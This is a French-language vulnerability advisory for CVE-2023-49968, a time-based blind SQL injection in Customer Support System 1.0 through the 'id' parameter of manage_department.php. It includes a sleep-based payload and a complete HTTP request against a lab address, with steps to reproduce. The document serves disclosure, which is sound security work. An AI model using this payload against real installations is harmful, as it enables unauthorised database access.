
Customer Support System 1.0 - Vulnérabilité d'injection SQL dans manage_department.php via le paramètre d'URL "id"
Description : Une vulnérabilité d'injection SQL existe dans la version 1 du Customer Support System. Un attaquant malveillant peut exécuter des commandes SQL sur la base de données MySQL en manipulant le paramètre URL 'id' lors de l'édition d'un département.
Version du produit vulnérable : Customer Support System 1.0
Auteur CVE : Geraldo Alcântara
Date : 28/11/2023
Confirmé le : 19/12/2023
CVE : CVE-2023-49968
Testé sur : Windows
1- Connectez-vous à l'application.
2- Accédez à la page d'édition du département, cliquez sur le bouton "Action" et sélectionnez "Edit".
3- Le paramètre 'id' sera passé, permettant l'insertion d'une charge utile malveillante.
payload : (select*from(select(sleep(5)))a)
GET /customer_support/manage_department.php?id=(select*from(select(sleep(5)))a) HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=department_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
Découvreur(s)/Crédits :
Geraldo Alcântara